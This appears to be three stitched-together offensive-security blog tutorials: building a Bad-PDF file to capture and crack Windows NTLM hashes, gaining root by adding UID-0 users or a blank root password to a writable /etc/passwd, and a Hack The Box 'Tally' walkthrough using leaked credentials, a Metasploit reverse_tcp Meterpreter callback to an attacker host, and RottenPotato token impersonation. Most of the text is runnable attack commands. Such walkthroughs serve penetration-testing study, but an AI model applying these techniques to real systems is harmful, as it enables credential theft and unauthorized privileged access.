Capture NTLM Hashes using PDF (Bad-Pdf)


Today we are demonstrating stealing NTLM hashes through a pdf file. We have already discussed the various method to Capture NTLM Hashes in a Network in our previous article. Recently a new tool has launched “Bad-PDF" and in this article, we are sharing our experience.
Bad-PDF create malicious PDF to steal NTLM(NTLMv1/NTLMv2) Hashes from windows machines, it utilizes vulnerability disclosed by checkpoint team to create the malicious PDF file. Bad-Pdf reads the NTLM hashes using Responder listener.
This method work for all PDF readers(Any version) and java scripts are not required for this attack, most of the EDR/Endpoint solution fail to detect this attack.
git clone https://github.com/deepzec/Bad-Pdf.git
cd Bad.Pdf
ls
chmod 777 badpadf.py




Now run the python file with the help of following command given below:
python badpdf.py
Then it will try to connect with Responder through its default path i.e. /user/bin /responder but in our case, the location of the responder is user/sbin/responder. After then it will ask your network IP, the name of the output file and interface name, submit this information as per your network.




Then it will create a malicious pdf file with name bad.pdf, now transfer this pdf file to your target.




So, when the victim will click our malicious file, his NTLM hash will be captured as shown in below image. Here you can observe username ‘raj’ along with its hash password. Now copy the hash value in a text document so that you can crack this hash value for retrieving the password.




We have paste the hash value in a text file and save it as "hash" on the desktop. Later we had used John the ripper for cracking the hash.
john hash
Awesome!!! We have retrieved password: 133 for user: raj.


Privilege Escalation in Linux using etc/passwd file

In this article, we will focus on exploring diverse techniques to modify the etc/passwd file, enabling us to create or alter a user and grant them root privileges. It becomes crucial to understand how to edit your own user within the /etc/passwd file when dealing with privilege escalation on the compromised system. If you're interested, we have previously demonstrated this method for privilege escalation in our earlier articles. You can find the links below.

Table of Contents

About /etc/passwd file

·       Understand the basic

·       Adding new user to /etc/passwd file

Different methods to create passwd for /etc/passwd file

·       OpenSSL

·       Mkpasswd

·       Python

·       Perl

·       Php

·       Ruby

·       Bonus: Hack Trick

 

Firstly, we should be aware of /etc/passwd file in depth before reaching the point. Inside etc directory, we will get three most important files i.e. passwdgroup, and shadow.

etc/passwd: It is a human-readable text file which stores information of user account.

etc/group: It is also a human-readable text file which stores group information as well as user belongs to which group can be identified through this file.

etc/shadow: It is a file that contains encrypted password and information of the account expire for any user.

The format of details in /passwd File







Get into its Details Description

Username: First filed indicates the name of the user which is used to login.

Encrypted password: The X denotes encrypted password which is actually stored inside /shadow file. If the user does not have a password, then the password field will have an *(asterisk).

User Id (UID): Every user must be allotted a user ID (UID). UID (zero) is kept for root user and UIDs 1-99 are kept for further predefined accounts, UID 100-999 are kept by the system for the administrative purpose. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given the UID of 1001.

Group Id (GID): It denotes the group of each user; like as UIDs, the first 100 GIDs are usually kept for system use. The GID of 0 relates to the root group and the GID of 1000 usually signifies the users. New groups are generally allotted GIDs begins from 1000.

Gecos Field: Usually, this is a set of comma-separated values that tells more details related to the users. The format for the GECOS field denotes the following information:

User’s full name

Building and room number or contact person

Office telephone number

Shell: It denotes the full path of the default shell that executes the command (by the user) and displays the results.

 NOTE: Each field is separated by (colon)

Let’s Start Now!!

Adding User by Default Method

Let’s start with reading /etc/passwd file through cat command, to view the present users available in our system.

cat /etc/passwd



From the image given above, you can find that “pentest” is the last user with uid 1000. Here gid 1000 denotes it is a non-system user.

Let see what happened in ‘/passwd’ file, when we add any user with adduser command. So here you can clearly match the following information from below given image.

adduser user1

Username: user1

GID: 1001

UID: 1001

Enter password: (Hidden)

Home Directory: /home/user1

Other Filed: Full Name, Room Number, Work phone, Home Phone, Other (are blanked)

 


When you will open /passwd file then you will notice that all the above information has been stored inside /etc/passwd file.

 


Repeat the steps again and adding user2 into /etc/passwd file.

 


Now check with tail command, user2 is successfully added to /etc/passwd file and below information is updated accordingly.

GID: 1002

UID: 1002

Enter password: (Hidden)

Home Directory: /home/user1

 


For the privilege escalation it is required that /etc/passwd file must have ‘rwx’ permissions for the logged in user. So, we are giving ‘rwx’ permission to /passwd file for lab setup.

Chmod 777 /etc/passwd

 


Now our lab setup is done.

Possible Scenarios:

If /etc/passwd file is editable what would be the possible scenarios to escalate the privileges?

Scenario 1: Replace the password hash for existing users in /etc/passwd file with our encrypted password.

Scenario 2: Manually add a new root privilege user to /etc/passwd file with our encrypted password.

Scenario 3: Tempering the root or high privilege user password in /etc/passwd file.

Lets start now!

Connect with this machine with SSH:

ssh pentest@192.168.1.22

tail /etc/passwd

ls -al /etc/passwd

 


It is clearly visible that /etc/passwd file has all permissions.

OpenSSL

Sometimes, the execution of the passwd command for user password setup might not be feasible. In such situations, the OpenSSL command can be employed. This command generates a salted encrypted password.

OpenSSL is a widely used open-source library that provides various cryptographic functions, protocols, and tools for securing communications over computer networks. The openssl passwd command allows you to generate password hashes for different algorithms, such as DES, MD5, SHA-256, and more.

Method 1

Here, we generated password in our kali machine.

openssl passwd raj

 


$1 = indicates that the generated passwd in MD5 hash format.

Now use this salted password for “aarti” user using echo command to put password in etc/passwd.

echo ‘aarti:$1$cJ05ZYPP$06zg1KtuJ/CbzTWPmeyNH1:0:0:root:/root:/bin/bash’ >> /etc/passwd

here, you can observed that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user “aarti”. Now switch user and access the terminal through aarti and confirm the root access.

tail /etc/passwd

su aarti

id

 


Method 2

This becomes relevant when OpenSSL is present on the victim's system, allowing us to create passwords within the victim's machine itself.

openssl passwd 123

echo ‘user3:ghTC5HTjVd/7M:0:0:root:/root:/bin/bash’ >> /etc/passwd

tail /etc/passwd

Now switch user and access the terminal through user3 and confirm the root access.

su user3

id

 


Cool!!! Both methods are working.

Mkpasswd

It is an alternate method of Openssl. mkpasswd is a command-line tool utilized for producing password hashes intended for diverse authentication systems.

mkpasswd -m <method> <password>

Here, <method> specifies the hash algorithm (like sha-512, md5, etc.), and <password> is the password you want to hash.

mkpa

sswd -m SHA-512 pass123

 


You can use the above similar method to add password to /etc/passwd file or manually edit.

nano /etc/passwd

In below image you can observe that I have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user4.

 

Now switch user and access the terminal through user4 and confirm the root access.

su user4

id



Great!!! It is also working.

Python

Python allows us to add salt to our passwords, which will create an encrypted password that includes the salt value.

python2 -c 'import crypt; print crypt.crypt("pass123", "$6$salt")'

If above command is not working, you can use the python3 or check the installed python version with “which python” command.

python3 -c 'import crypt; print (crypt.crypt("pass123", "$6$salt"))'

 

Use any method to edit and put encrypted passwd into /etc/passwd file and switch to user5. Here we used nano editor.

su user5

id

 


It is also working.

Perl

Similar to this, we can create a hash value for our password using salt value using Perl along with crypt.

perl -le 'print crypt("pass123", "abc")'

 


You will get the encrypted password; repeat the manual step of adding new user "user6" and putting the encrypted value into the password field with the echo command in terminal.

echo ‘user6:abBxjdJQWn8xw:0:0:root:/root:/bin/bash’ >> /etc/passwd

here, you can see that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user6. Switch to new user user6

su user6

id

 


Great!! This method is also working.

PHP

The hash for our password may also be created using PHP along with crypt using the salt value.

php -r "print(crypt('aarti','123') . \"\n\");"

 


You will get the encrypted password; repeat the same method of adding new user "user7" and putting the encrypted value into the password field with the echo command in terminal.

echo ‘user7:121z.fuKOKzx.:0:0:root:/root:/bin/bash’ >> /etc/passwd

In below image you can observe that we have allotted uid: 0 and gid: 0 and home directory /root/root hence we have given root privilege to our user7.

tail -n 2 /etc/passwd

su user7

id

 


Working!!!

Ruby

As we have already use Python, Perl, PHP in the same way Ruby can be used for creating encrypted password along with crypt using the salt value.

ruby -r ‘digest’ -e ‘puts “pass”.crypt(“$6$salt”)’

 


Use any of above way to edit /etc/passwd and switch to new user user8

su user8

id

 


This is also working.

Bonus: Hack Trick

If you are lazy to perform any of above methods you should try this!!!

If /etc/passwd file is having -rwxrwxrwx permissions in victim system, open /etc/passwd file and remove the ‘X’ or ‘*’ value at the place of root password. As shown in image below:

 


Methodology: The 'x' value in the /etc/passwd file indicates that the actual password hash is stored in the /etc/shadow file (or a similar location), rather than in the /etc/passwd file itself.

If you remove the 'x' value and replace it with something else or leave it blank, the root user's password will no longer be stored securely and the system won't be able to authenticate the root user using the stored password hash from the /etc/shadow file.

Keep the root password blank and save the /etc/passwd file.

root::0:0:root:/root:/bin/bash

 


Now, switch to root user

su root

id



Boom… you have the root access without passwd. You can use this method on other high privilege user roles.

Hence there are so many ways to escalate privileges via editable /etc/passwd. 

Hack the Box Challenge: Tally Walkthrough


Hello Friends!! Today we are going to solve a CTF Challenge “Tally”. It is a lab that is developed by Hack the Box. They have an amazing collection of Online Labs, on which you can practice your penetration testing skills. They have labs are designed for beginner to the Expert penetration tester. Tally is a Retired Lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, therefore, they have a static IP. Tally Lab has IP: 10.10.10.59.
Now, as always let’s begin our hacking with the port enumeration.

nmap -p- -A 10.10.10.59




When you will explore target IP through the browser, it will be redirected to a SharePoint page as shown below which also declared by nmap in above image.




Then we have used several directory brute-forcer tools in order to enumerate some useful URL for web directory but failed to retrieve. Then I penetrate for the web directory manually with the help of Google search and slowly and gradually reached at /sitepages/FinanceTeam.aspx and found ftp username as shown below in the image.
Moreover, I found a link for SharePoint directory brute-force attack that helps me in my next step.




We found this URL http://10.10.10.59/shared documents/forms/allitems.aspx from inside above-given link, and when you will open above path in your browser as shown below, you will see a file named "ftp-details". Download this doc file and open it.




You will get a password from inside ftp details doc file.




Now login into FTP using following credentials and download tim.kdbx in your local machine.
Username: ftp_user
Password: UTDRSCH53c"$6hys




Since the file contains .kdbx extension and I don't know much about it, therefore, I jumped for Google search from there I got this link to download a python script that extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases.
python keepass2john.py tim.kdbx > tim
Next, we have used John the ripper for decrypting the content of “tim" with help of the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim




When you will obtain the password for “keepass2” which is an application used for hiding passwords of your system then you need to install it (keepass2) using the following command:
apt-get install keepass2 -y
After installing, run the below command and submit “simplementeyo" in the field of the master key.
keepass2 tim.kdbx
Then you can find username and password from inside /Work/Windows/Shares for sharing a file through SMB login, since port 135-445 are open in targets machine for sharing files.
Here the password is hidden inside * character; copy and paste it into a text file and you will get the password into plain letters I.e. Acc0unting .




Now you are having SMB login credential “Finance: Acc0unting”, then execute following command for connecting with targets network and It will show “ACCT” as sharename.
smbclient -L 10.10.10.59 -U Finance




Further type below commands and at last when you found conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt




When you will download conn-info.txt file, open it, it will tell you MSSQL database login credential.
db: sa
pass: YE%TJC%&HYbe5Nw

From below image you can observe that, it was old server details and might be the password for sa has been changed now.



Again login into SMB and look for next hint by moving into /zz_Migration, for that you need to execute below commands:
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"
Here you will found tester.exe, download it.
get tester.exe



You will get tester.exe inside your /root directory since the file is too large, it is impossible to find desirable information from that. Therefore use grep along with strings command.





strings tester.exe | grep DATABASE
And you will get a new password for user sa as shown in below image.




For next step I took help from our previous article which was on MSSQL penetration testing. Open a new terminal and load metasploit framework and execute below commands.
use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for .dll and Paste it inside as CMD command as shown in next image.




Now open new terminal and again load a new metasploit framework and execute below commands.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit




You will get meterpreter session of victim’s machine in your 1st metasploit framework and after then finished the task by grabbing user.txt and root.txt file. Further type following:
getuid
So currently we don’t have NT AUTHORITY\SYSTEM permission.




But we have successfully grabbed user.txt file from inside /Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt
In this way we have completed our first task. Now let's find root.txt!!




load incognito
Incognito option in meterpreter session was originally a stand-alone application that permitted you to impersonate user tokens when successfully compromising a system. And then we need to do first is identify if there are any valid tokens on this system
list_token -u
If we talk related to impersonate token then you can see currently there is no token available.




Then I took help from Google in such scenario and found a link for downloading Rottenpotato from github for privilege escalation.
git clone https://github.com/foxglovesec/RottenPotato.git
After downloading it will give rottenpotato.exe file.




Upload the exe file into victim's machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type below command for executing exe file and then add SYSTEM token under impersonate user tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"
After then when you will run getuid command again, it will tell you that you have escalated NT AUTHORITY\\SYSTEM




Then come back to /Users directory and perceive available directories inside it. You will get root.txt form inside C:\Users\Administrator\Desktop go and grab it, and finished the task.
cd Administrator
cd Desktop
ls
cat root.txt
Fabulous!! The task has been completed and hacked this box.